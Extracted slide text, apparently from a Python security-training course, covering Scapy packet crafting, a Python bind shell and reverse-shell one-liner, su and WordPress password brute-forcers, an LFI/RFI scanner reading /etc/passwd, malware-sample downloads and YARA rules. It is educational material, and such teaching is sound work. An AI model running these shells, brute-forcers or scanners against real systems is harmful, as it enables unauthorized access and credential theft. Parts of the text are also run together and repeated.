Lesson 24: Sending a UDP Packet with Scapy
Preparing the Target$ ncat -ulvp 4444
--open another terminal--In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key: u = UDP() u.display()
This creates an object named u of type UDP, and displays its properties.Execute these commands to change the destination port to 4444 and display the properties again:
i.dst="10.10.2.97" <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)
u.dport = 4444 u.display()
Execute this command to send the packet to the Windows machine: send(i/u/"YOUR NAME SENT VIA UDP\n") On the Windows target, you should see the message appear
101
Lesson 25: Ping Sweeping with Scapy
#!/usr/bin/pythonfrom scapy.all import *
TIMEOUT = 2conf.verb = 0for ip in range(0, 256): packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP() reply = sr1(packet, timeout=TIMEOUT) if not (reply is None): print reply.dst, "is online" else: print "Timeout waiting for %s" % packet[IP].dst
102
Checking Out Some Scapy Based Port Scanners
wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py
cat rdp_scan.py
sudo python rdp_scan.py 10.10.30.250
103
Dealing with conf.verb=0 NameError#
conf.verb = 0NameError: name 'conf' is not defined
Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from:
from scapy import *to
from scapy.all import *
Reference:http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html
conf.verb=0 is a verbosity setting (configuration/verbosity = conv
Here are some good Scapy references:http://www.secdev.org/projects/scapy/doc/index.htmlhttp://resources.infosecinstitute.com/port-scanning-using-scapy/http://www.hackerzvoice.net/ouah/blackmagic.txthttp://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html
104
Bind and Reverse Shellsvi simplebindshell.py
#!/bin/pythonimport os,sys,socket
ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);print '-Creating socket..'port = 31337try:
ls.bind(('', port))print '-Binding the port on ' ls.listen(1)print '-Listening, '(conn, addr) = ls.accept()print '-Waiting for connection...'cli= conn.fileno()print '-Redirecting shell...'os.dup2(cli, 0)print 'In, 'os.dup2(cli, 1)
105
Lesson 26: Bind and Reverse Shellsprint 'Out, '
os.dup2(cli, 2)print 'Err'print 'Done!'arg0='/bin/sh'arg1='-a'args=[arg0]+[arg1]os.execv(arg0, args)
except(socket.error):print 'fail\n'conn.close()sys.exit(1)
nc TARGETIP 31337
106
Bind and Reverse Shells (Continued)
Preparing the target for a reverse shell$ ncat -lvp 4444
--open another terminal--wget https://www.trustedsec.com/files/simple_py_shell.py
vi simple_py_shell.py
107
Bind and Reverse Shells (Continued)
Tricky shells
Reference:http://securityweekly.com/2011/10/python-one-line-shell-code.htmlhttp://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/
108
Review Concepts (Shells)• Python Reverse Shell (Linux)$ sudo /sbin/iptables -F$ ncat -l -v -p 1234
--open another terminal--python -c 'import socket,subprocess, os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect((“127.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
109
Review Concepts (Shells)• Python Reverse Shell (Linux or Windows)$ sudo /sbin/iptables -F$ ncat -l -v -p 1234
--from Windows--Download this file: https://www.trustedsec.com/files/RevShell_PoC_v1.py
Explain to me how/why this script works…
110
Review Concepts (Scapy)• Installing scapysudo apt-get update sudo apt-get install python-scapy python-pyx python-gnuplot
To run Scapy interactively
sudo scapy
111
Review Concepts (Scapy)• Sending packets with scapyIn the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter
key:
i = IP()
This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:
i.display()
Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:
i.dst="10.10.30.61"
i.display()
112
Review Concepts (Scapy)• Sending packets with scapyNotice that scapy automatically fills in your machine's source IP address.
Use these commands to create an object named ic of type ICMP and display its properties:
ic = ICMP()
ic.display()
Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L:
sr1(i/ic)
113
Review Concepts (Scapy)• Sending packets with scapyThis command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. As you can see in the
image above, the response is shown, with ICMP type echo-reply.
The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.
Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):
sr1(i/ic/"YOUR NAME")
You should see a reply with a Raw section containing your name.
114
Review Concepts (Scapy)• Sending packets with scapyPreparing the Target$ ncat -l -v -p 4444
--open another terminal--In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the
Enter key:
u = UDP()
u.display()
This creates an object named u of type UDP, and displays its properties.
115
Review Concepts (Scapy)• Sending packets with scapyExecute these commands to change the destination port to 4444 and display the properties again:
i.dst="10.10.2.97" <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)
u.dport = 4444
u.display()
Execute this command to send the packet to the Windows machine:
send(i/u/"YOUR NAME SENT VIA UDP\n")
116
Review Concepts (Scapy)• Sending packets with scapyExecute these commands to change the destination port to 4444 and display the properties again:
i.dst="10.10.2.97" <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)
u.dport = 4444
u.display()
Execute this command to send the packet to the Windows machine:
send(i/u/"YOUR NAME SENT VIA UDP\n")
On the Windows target, you should see the message appear
117
Review Concepts (Scapy)• RDP port sweeping with scapycat rdp_scan.py
sudo python rdp_scan.py 10.10.30.250
118
Review Concepts (Scapy)• Dealing with conf.verb=0 NameErrorconf.verb = 0NameError: name 'conf' is not defined
Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from:
from scapy import *to
from scapy.all import *
119
Review Concepts (Scapy)• Dealing with conf.verb=0 NameErrorReference:http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html
conf.verb=0 is a verbosity setting (configuration/verbosity = conv)
120
Review Concepts (Scapy)• ScapyHere are some good Scapy references:http://www.secdev.org/projects/scapy/doc/index.htmlhttp://resources.infosecinstitute.com/port-scanning-using-scapy/http://www.hackerzvoice.net/ouah/blackmagic.txt
http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html
121
Password Cracking
• Password cracking with Python
122
Agenda
• Python sockets, shells and port scanning– Functions– The crypt function– The split() function
123
Review Concepts• Crypt() Function & Split() MethodPython can make use of functions:http://www.tutorialspoint.com/python/python_functions.htm
Python can interact with the 'crypt' function used to create Unix passwords:http://docs.python.org/2/library/crypt.html
Tonight we will see a lot of the split() method so be sure to keep the following references close by:http://www.tutorialspoint.com/python/string_split.htm
124
Review Concepts• htpasswd crackervi htcrack.py
vi list.txt
hellogoodbyeredblueyournametimbob
125
Review Concepts• htpasswd crackerhtpasswd -nd yourname
- enter yourname as the password
python htcrack.py joe:7XsJIbCFzqg/o list.txt
126
Review Concepts• su password crackersudo apt-get install -y python-mechanize
rm -rf mechanize-0.2.5.tar.gz
sudo /bin/bash
passwd***set root password***
127
Review Concepts• su password crackervi rootbrute.py
128
Review Concepts• md5 password crackervi md5crack.py
Why use hexdigesthttp://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string
http://md5online.net/
129
Lesson 27: Python Functions & String Handling
Python can make use of functions:http://www.tutorialspoint.com/python/python_functions.htm
Python can interact with the 'crypt' function used to create Unix passwords:http://docs.python.org/2/library/crypt.html
Tonight we will see a lot of the split() method so be sure to keep the following references close by:http://www.tutorialspoint.com/python/string_split.htm
Tonight we will see a lot of slicing so be sure to keep the following references close by:http://techearth.net/python/index.php5?title=Python:Basics:Slices
130
Lesson 28: Password Crackingwget https://s3.amazonaws.com/SecureNinja/Python/htcrack.py
vi htcrack.py
vi list.txt
hellogoodbyeredblueyournametimbob
htpasswd -nd yourname- enter yourname as the password
131
Password Cracking (Continued)python htcrack.py joe:7XsJIbCFzqg/o list.txt
sudo apt-get install -y python-mechanize
rm -rf mechanize-0.2.5.tar.gz
sudo /bin/bash
passwd***set root password***
132
Password Cracking (Continued)vi rootbrute.py
#!/usr/bin/env python
import systry: import pexpectexcept(ImportError): print "\nYou need the pexpect module." print "http://www.noah.org/wiki/Pexpect\n" sys.exit(1)
#Change this if needed.# LOGIN_ERROR = 'su: incorrect password'LOGIN_ERROR = "su: Authentication failure"
133
Password Cracking (Continued)def brute(word): print "Trying:",word child = pexpect.spawn('/bin/su') child.expect('Password: ') child.sendline(word) i = child.expect (['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3) if i == 1: print "Incorrect Password"
if i == 2: print "\n\t[!] Root Password:" ,word child.sendline ('id') print child.before child.interact()
if len(sys.argv) != 2: print "\nUsage : ./rootbrute.py <wordlist>" print "Eg: ./rootbrute.py words.txt\n" sys.exit(1)
134
Password Cracking (Continued)try: words = open(sys.argv[1], "r").readlines()except(IOError): print "\nError: Check your wordlist path\n" sys.exit(1)
print "\n[+] Loaded:",len(words),"words"print "[+] BruteForcing...\n"for word in words: brute(word.replace("\n",""))
words = open('/home/strategicsec/list.txt','r').readlines()
135
Password Cracking (Continued)
References you might find helpful:http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python
wget https://s3.amazonaws.com/SecureNinja/Python/md5crack.py
vi md5crack.py
136
Password Cracking (Continued)Why use hexdigesthttp://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-stringhttp://md5online.net/
wget https://s3.amazonaws.com/SecureNinja/Python/wpbruteforcer.py
####################### Lesson 29: Web App #######################vi wpbruteforcer.py
python wpbruteforcer.py -t strategicsec.com -u j0e -w list.txt
sudo echo yourname > /var/www/yourname.txt
137
Password Cracking (Continued)vi LFI-RFI.py
#!/usr/bin/env pythonprint "\n### PHP LFI/RFI Detector ###"print "### Sean Arries 09/18/09 ###\n"
import urllib2,re,sys
TARGET = "http://10.10.10.107/showfile.php?filename=contactus.txt"RFIVULN = "http://10.10.2.203/j0e.txt?"TravLimit = 12
print "==> Testing for LFI vulns.."TARGET = TARGET.split("=")[0]+"=" ## URL MANUPLIATIONfor x in xrange(1,TravLimit): ## ITERATE THROUGH THE LOOP
138
Password Cracking (Continued) TARGET += "../" try: source = urllib2.urlopen((TARGET+"etc/passwd")).read() ## WEB REQUEST except urllib2.URLError, e: print "$$$ We had an Error:",e sys.exit(0) if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE print "!! ==> LFI Found:",TARGET+"etc/passwd" break ## BREAK LOOP WHEN VULN FOUND
print "\n==> Testing for RFI vulns.."TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANUPLIATIONtry: source = urllib2.urlopen(TARGET).read() ## WEB REQUESTexcept urllib2.URLError, e: print "$$$ We had an Error:",e sys.exit(0)if re.search("j0e",source): ## SEARCH FOR TEXT IN SOURCE print "!! => RFI Found:",TARGETprint "\nScan Complete\n" ## DONE
139
Your 2nd Challenge
• Your first challenge• Write an attack log parser• Create lists (files) that contain the attacks
• SQL Injection:• ['union','order','having','group','select','drop','update']
• XSS:• ["XSS","alert","String.fromCharCode","iframe","javascript",
• SQL Injection Attack Syntax Reference:• http://websec.ca/kb/sql_injection• http://ckers.org/sqlinjection/• http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
• XSS Attack Syntax Reference:• https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
• LFI References:• http://www.exploit-db.com/papers/12992/
140
Lesson 29: Web App
• Web App Testing with Python
141
Objectives
• Web App Testing with Python
142
Agenda
• Web App Testing with Python– Brute Forcing Wordpress– The crypt function– The split() function
143
Review Concepts• Wordpress Bruteforcevi wpbruteforcer.py
python wpbruteforcer.py -t strategicsec.com -u j0e -w list.txt
144
Your Task• Your x task• Work together - Use Python to read in a file line by line
• Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.
145
Another Task• Your third task• Work together - Use Python to read in a file line by line
• Can you write an if/then statement that looks for this IP and print "Found it"
• 141.101.81.187
146
Another Challenge
• Your first challenge• Write an attack log parser• Create lists (files) that contain the attacks
• SQL Injection:• ['union','order','having','group','select','drop','update']
• XSS:• ["XSS","alert","String.fromCharCode","iframe","javascript",
• SQL Injection Attack Syntax Reference:• http://websec.ca/kb/sql_injection• http://ckers.org/sqlinjection/• http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
• XSS Attack Syntax Reference:• https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
• LFI References:• http://www.exploit-db.com/papers/12992/
147
Day 4: Malware
• Malware Analysis
148
Objectives
• Malware with Python
149
Agenda
• Malware Analysis with Python– Brute Forcing Wordpress– The crypt function– The split() function
150
Review Concepts• Manual Malware Analysiswget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zipunzip malware-password-is-infected.zip
infectedfile malware.exestrings malware.exestrings malware.exe | grep -i dllstrings malware.exe | grep -i librarystrings malware.exe | grep -i regstrings malware.exe | grep -i ircstrings malware.exe | grep -i joinobjdump -x malware.exe
151
Review Concepts• Automated Malware Analysisvi analyse_malware.py
python analyse_malware.py malware.exe
152
Review Concepts• Building a Malware ArchiveHere is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:http://derekmorton.name/files/malware_12-14-12.sql.bz2
Malware Repositories:http://malshare.com/index.phphttp://www.malwareblacklist.com/http://www.virusign.com/http://virusshare.com/
153
Review Concepts• Building a Malware Databasewget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.pywget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zipunzip malware-password-is-infected.zip
infectedpython avsubmit.py --initpython avsubmit.py -f malware.exe -e
154
Review Concepts• Building a Malware Databasesudo apt-get install mysql-serversudo apt-get build-dep python-mysqldbsudo apt-get install python-mysqldbmysql -u root -pcreate database database_nameuse database_name
python mal_to_db.py -i -f mal_file_name -u
155
Lesson 30: Malware Analysis This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected':wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zipwget http://www.beenuarora.com/code/analyse_malware.py
unzip malware-password-is-infected.zipinfected
file malware.exe
mv malware.exe malware.pdf
file malware.pdf
mv malware.pdf malware.exe hexdump -n 2 -C malware.exe ***What is '4d 5a' or 'MZ'***Reference: http://www.garykessler.net/library/file_sigs.html
156
Lesson 30: Malware Analysis objdump -x malware.exe strings malware.exe
strings --all malware.exe | head -n 6 strings malware.exe | grep -i dll strings malware.exe | grep -i library
strings malware.exe | grep -i reg
strings malware.exe | grep -i hkey
strings malware.exe | grep -i hku
- We didn't see anything like HKLM, HKCU or other registry type stuff
157
Lesson 30: Malware Analysis strings malware.exe | grep -i irc
strings malware.exe | grep -i join
strings malware.exe | grep -i admin
strings malware.exe | grep -i list
- List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commandssudo apt-get install -y python-pefile
vi analyse_malware.py
python analyse_malware.py malware.exe
Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:http://derekmorton.name/files/malware_12-14-12.sql.bz2
158
Lesson 30: Malware Analysis Malware Repositories:http://malshare.com/index.phphttp://www.malwareblacklist.com/http://www.virusign.com/http://virusshare.com/http://www.tekdefense.com/downloads/malware-samples/
159
Lesson 31: Creating a Malware Database
Creating a malware database (sqlite)------------------------------------wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.pywget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zipunzip malware-password-is-infected.zip
infectedpython avsubmit.py --initpython avsubmit.py -f malware.exe -e
160
Lesson 31: Creating a Malware Database
Creating a malware database (mysql)-----------------------------------Step 1: Installing MySQL databaseRun the following command in the terminal:
sudo apt-get install mysql-server
Step 2: Installing Python MySQLdb moduleRun the following command in the terminal:
sudo apt-get build-dep python-mysqldbsudo apt-get install python-mysqldb
Step 3: Logging in Run the following command in the terminal:
mysql -u root -p (set a password of 'malware')
161
Lesson 31: Creating a Malware Database
Then create one database by running following command:
create database malware;
wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
vi mal_to_db.py -i (fill in database connection information)python mal_to_db.py -i
python mal_to_db.py -i -f malware.exe -u
mysql -u root -pmalware
mysql> use malware;select id,md5,sha1,sha256,time FROM files;
mysql> quit;
162
Your Task• Your x task• Work together - Use Python to read in a file line by line
• Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.
163
Another Task• Your third task• Work together - Use Python to read in a file line by line
• Can you write an if/then statement that looks for this IP and print "Found it"
• 141.101.81.187
164
Your 2nd Challenge
• Your first challenge• Write an attack log parser• Create lists (files) that contain the attacks
• SQL Injection:• ['union','order','having','group','select','drop','update']
• XSS:• ["XSS","alert","String.fromCharCode","iframe","javascript",
• SQL Injection Attack Syntax Reference:• http://websec.ca/kb/sql_injection• http://ckers.org/sqlinjection/• http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
• XSS Attack Syntax Reference:• https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
• LFI References:• http://www.exploit-db.com/papers/12992/
165
Lesson 32: Setting up Yarasudo apt-get install clamav clamav-freshclam
sudo freshclam
sudo Clamscan
sudo apt-get install libpcre3 libpcre3-dev
wget https://github.com/plusvic/yara/archive/v3.1.0.tar.gz
wget http://yara-project.googlecode.com/files/yara-python-1.4.tar.gz
tar -zxvf v3.1.0.tar.gz
cd yara-3.1.0/
./bootstrap.sh
./configure
make
make check
sudo make install
166
Lesson 32: Setting up Yaracd yara-python/
python setup.py build
sudo python setup.py install
cd ..
yara -v
wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/3/clamav_to_yara.py
sigtool -u /var/lib/clamav/main.cvd
python clamav_to_yara.py -f main.ndb -o clamav.yara
wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
unzip malware-password-is-infected.zipinfected
mkdir malcode/
mv malware.exe malcode/
vi testrule.yara----------------
167
Lesson 32: Setting up Yararule IsPE{ meta: description = "Windows executable file" condition: // MZ signature at offset 0 and ... uint16(0) == 0x5A4D and // ... PE signature at offset stored in MZ header at 0x3C uint32(uint32(0x3C)) == 0x00004550}rule has_no_DEP{ meta: description = "DEP is not enabled"
condition: IsPE and uint16(uint32(0x3C)+0x5E) & 0x00100 == 0}
rule has_no_ASLR{ meta: description = "ASLR is not enabled" condition: IsPE and uint16(uint32(0x3C)+0x5E) & 0x0040 == 0}----------------
168
Lesson 32: Setting up Yarayara testrule.yara malcode/malware.exe
mkdir rules/
cd rules/
wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/5/capabilities.yara
wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/6/magic.yara
wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/4/packer.yara
cd ..yara rules/ malcode/malware.exe
wget https://github.com/Xen0ph0n/YaraGenerator/archive/master.zipunzip master.zipcd YaraGenerator-master/
python yaraGenerator.py ../malcode/ -r Test-Rule-2 -a "Joe McCray" -d "Test Rule Made With Yara Generator" -t "TEST" -f "exe"
cat Test-Rule-2.yar
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
yara Test-Rule-2.yar putty.exe
169
Additional Tasks- PE Scanner:https://malwarecookbook.googlecode.com/svn/trunk/3/8/pescanner.pyhttp://www.beenuarora.com/code/analyse_malware.py
- AV submission:http://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.pyhttps://raw.githubusercontent.com/dcmorton/MalwareTools/master/vtsubmit.py
- Malware Database Creation:https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py